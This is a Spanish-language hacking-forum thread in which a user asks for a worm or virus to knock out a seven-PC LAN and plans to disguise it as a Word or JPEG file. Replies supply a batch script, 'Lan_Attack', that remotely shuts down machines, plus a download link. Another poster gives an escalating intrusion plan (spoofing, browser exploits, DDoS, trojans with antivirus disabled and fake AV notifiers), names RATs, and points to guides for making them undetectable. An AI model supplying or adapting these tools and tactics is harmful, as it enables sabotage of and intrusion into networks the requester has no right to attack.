Necesito un gusano para infectar una red (titulo modificado)

[MIKELOS24]

Hola a toda la comunidad de HACKPR.NET necesito ayuda urgente pues necesito dos gusanos de red urgentemente, espero me puedan recomendar algunos... se que si algo sobra en este foro es conocimientos e imaginación, nunca me han fallado y una vez mas pido su ayuda
La red es una Lan, con posible acceso al pc servidor, me imagino que blindeando el gusano puedo lograr este objetivo... no se trata de un cyber o alguna red de colegio, es una simple red de 7 pc´s (no se trata de venganza personal) que tal vez cuente con el Norton y tal vez este hasta desactualizado, lo que me interesa es dejar obsoleta la red, por un buen rato...

[josealcuevas]

no entendi lo que quieres hacer muy bien, pero para snnifear redes, puedes usar el cain&abel, postea mejor tu duda que te ayudamos...


Komtec1

[kazin]

Se refiere a mandarle un virus que rompa todo... o sino que rompa simplemente la red.

Lamento no poder ayudarte, pero no tengo mucho conosiemiento de virus.

[SnO.opy]

Pues creo q esto te sirve aun no lo e probado ya q vagando por la web lo vi modifiq cualquier cosita y pues no tenia ni nombre..

Code Select Expand


:menulan
@echo OFF
title Lan_Attack By MySteriouS F34R -=:]¦[ Kraft HackS ]¦[:=-
color 8e
echo.                 Lan_Attack
echo.                 
echo.                     By
echo.             
echo.               MySteryouS F34R
echo.
echo.          -=:]¦[ Kraft HackS ]¦[:=-
echo.
echo.
echo.                    Menu
echo.               **************
echo.      1- Enviar un mensaje a aguien de red local.
echo.      2- Apagar el ordenador de alguien de la red local.
echo.      3- Enviar un mensaje a todos los pc's de la red local.
echo.      4- Salir del programa.
echo.      5- Regresar al Menu
echo.
set /p opc= Teclea:
If %opc%== 1 goto mensaje
If %opc%== 2 goto apagar
If %opc%== 3 goto todos
If %opc%== 4 goto salir
If %opc%== 5 goto menu

@echo off
: todos
cls
set /p sms= Escriba el mensaje que quiere que vean todos los de su red Lan.
net send/domain %sms%
ping 127.0.0.0.1 -2 >nul
cls
msg * Opcion realizada con exito.
goto menulan

@echo off
:mensaje
cls
set /p pc= Escriba la Ip del pc remoto al cual le va a enviar el mensaje.
set /p sms= Escriba aqui el mensaje.
echo. Enviando...
net send %pc% %sms%
ping 127.0.0.0.1 -1 > nul
msg * Opcion realizada con exito!!
goto menulan

@echo off
:apagar
cls
set /p apag= Escriba la Ip del pc remoto al cual le va a apagar el pc.
set /p tiem= Indica en segundos el tiempo que quiere que tarde en apagarse.
set /p com= Escribe un pequeño comentario que saldra junto su apagado.
shutdown -s -t %tiem% -m %apag% -c "%com%"
ping 127.0.0.0.1 -1 >nul
cls
msg * Opcion realizada con exito!!
goto menulan

@echo off
:salir
cls
echo.                                 
pause>nul
exit


o si lo quieres ya en .bat bajalo de aqui:

Lan_Attack

http://rapidshare.de/files/37281401/lan_attack.bat.html

Tu dices hacerle algo pues de hay si esta el admin. en el mismo grupo de trabajo ya la hiciste solo apaga su PC y ten ventaja en revisar archivos..O algo mientras  apagas su pc instala el CAIN q es un exelente sniffer de lans

[kazin]

Exelente aporte, pero me parece que el queria el virus en si, cosa de mandar un .exe y que solito se rompa todo. Me equivoco?

[Uleila.com]

MIKELOS24 me parece que lo primero que debes hacer es poner un titulo en condiciones, pienso que no se te deberia haber ayudado, hasta que el post cumpliese con las normas establecidas. Yo por lo pronto, puedo ayudarte pero no lo haré hasta que no cambies el titulo.

(Ya se modifico el titulo del tema..)

[kazin]

Sisi... por cosas como esas el buscador despues no anda 

[MIKELOS24]

Primero que nada thank´s a todos por sus aportes y recomendaciones, lo del titulo fue un detalle que se me pasó pues no es la primera vez que posteo preguntas o doy respuestas, solo que en verdad me urge para este fin de semana, y tienes razón ¹SlowEmotion² lo único que necesito es un virus en .exe para romper la red o dejarla lo mas lenta posible...

P.D. esto puede sonar demasiado sencillo pero solo es un pequeño paso para cumplir un objetivo  mas grande, lo curioso es que por desconocer la herramienta adecuada para inutilizar la red LAN  se me complica todo 

[kazin]

Pero vos tenes acceso fisico a alguna de esas maquinas? osea... estas dentro de la red LAN?

[MIKELOS24]

claro, incluso ejecutaria el .exe directo en la pc principal claro blindeado con un archivo de word o ocultado con el logo de una imagen jpeg.

[the_hacker_666]

Pues yo lo haria del siguiente modo...

Una vez que conozca una de las ip's externas de la red (si esta utiliza un router o concentrador), uso la shell de windows (ping -t <IP>) para abrir una conexion permanente, luego snifeo con un snifer independiente (no es el snifer ARP que trae el cain, googleen un poco) y tomo notas de los paquetes enviados y recibidos por el router o la maquina.

Una vez hecho esto, uso un editor de packetes para simular que soy una de las conexiones con las que el router tiene contacto, como el ISP por ejemplo.

Una vez hecho esto, puedo obtener acceso a las Ip's internas (haciendo tracer desde el router hasta 255.255.255.255 y guardando los logs de las ip's activas, esto se puede hacer con un scanner de ip).

Luego de esto, me dedico a estudiar la situacion de cierta pc, por ejemplo, que explorador usa (a ver si puedo inyectar algo, hay muchos exploits para IE ).

Si ninguno de los pasos es posible, simplemente obtengo el ip del server, y hago un DDoS masivo hasta que este no tenga control sobre las pc (depende de la pc y el sistema operativo)

Si esto tampoco es posible, puedo usar un auto trojan downloader en una web, en una de las pc, y utilizo ingenieria social para que se abra la web en esta web, de ese modo obtengo acceso remoto por medio de un troyano.

Si esto tampoco es posible, puede scanearse los puertos de las pc, para buscar alguna vulnerabilidad directa, por ejemplo: netbios, vnc u otro programa de compartimiento (poco posible)

¿Tampoco se pudo? entonces, intento aplicar un metodo muy conocido para obtener acceso a redes internas, mediante el ip spoof, lo cual me permite "falsificar mi ip" (esto solo es posible cuando una de las pc esta apagada, asi q puedes tomar su lugar).

¿ningun resultado? Puedes intentar Denial Of Service en las pc que se conectan al server, y usar el descontrol para hacerte con el control...

¿Aun nada??? Entonces intento ing social por msn u otro metodo de chat, e intento troyanizar o keyloggear al admin.

Si no puedes o sabes hacer funcionar ninguno de los metodos mencionados, te recomiendo www.google.com

Si no funciono, pues, creo que es una red segura.

PD: tambien puedes usar el Metodo del Sniffer del cain si tienes acceso fisico a una de las pc.

salu2

[kazin]

JOJOJOJO terrible informe!! realmente se te extrañaba en el foro

Si tiene acceso a la pc servidora asi que simplemente le conviene poner el troytano el mismo y listo . Pero osea... eso todo bien pero me parese que el quiere un VIRUS o un VIRUS... nada mas. me explico?

[the_hacker_666]

entonces usa un troyano!! jejeje, yo usaria un troyano y desactivaria el antivirus (permanentemente), o instalaria un notificador falso (de esos que dicen que el antivirus esta activado, pero que es totalmente MENTIRA jajaja, me ha pasado mucho)

es el mejor modo, porq el admin no se daria cuenta de nada, entonces silenciosamente instalas el troyano en todas las demas pc's, y planeas un ping eterno de 25000000000000000 Kilobytes por paquete (jejeje) desde una pc a otra o hasta el servidor o la pc principal.

una vez con el troyano encima, lo demas es muy facil.

[MIKELOS24]

Asi es man, solo pido un gusano o virus, creanme es uno de los pasos mas sencillos para cumplir el objetivo que tengo pero me esta costando mas de lo debido... si alguien sabe el nombre de algun worm de red o virus no tan facil de detectar o es mas si lo tienen como archivo se los agradecería muchisimo, eso es todo...  

[kazin]

entonces usa un troyano!! jejeje, yo usaria un troyano y desactivaria el antivirus (permanentemente), o instalaria un notificador falso (de esos que dicen que el antivirus esta activado, pero que es totalmente MENTIRA jajaja, me ha pasado mucho)

es el mejor modo, porq el admin no se daria cuenta de nada, entonces silenciosamente instalas el troyano en todas las demas pc's, y planeas un ping eterno de 25000000000000000 Kilobytes por paquete (jejeje) desde una pc a otra o hasta el servidor o la pc principal.

una vez con el troyano encima, lo demas es muy facil.

Concuerdo con el... nose cuales sean tus intenciones... y tampoco entiendo porque estas tan empesinado con un virus... ya que hay varas formas de destruccion. Y el trojan puede ser una de ellas.

Respecto al ping eterno...  eso debe doler!

[the_hacker_666]

El biffrost es de conexion inversa, pero para un maximo potencial, puedes usar el CIA, o el proRat (incluso el Optix pro), todos son troyanos, y muy excelentes...

PD: si quieres hacerlos indetectables, creo que mi amigo Deyabu puede explicarte mas al respecto

PD2: uy duele mucho... prueba con dos pc en una LAN y utiliza uno de 1024 Kb por paquete y a al mismo tiempo intenta hacer uso de la red (pasar archivos, abrir archivos compartidos en la otra pc) y veras como afecta eso... Luego imaginate multiplicar el tamaño de ese archivo por 10000000000 

[kazin]

Jejeje lindo estilo tenes .

Respecto a lo del server indetectable:

http://hackpr.net/foro/index.php?topic=3705.0 Powered by Deyabu Roolz

http://hackpr.net/foro/index.php?topic=4133.0 Powered by Komtec1.


Saludos a todos ...

[MIKELOS24]

bueno, ya de perdida pasenme alguna pag con un trojan autodownloader, por que lo de el brifost lo descarte desde el principio y no es por que no sepa utilizarlo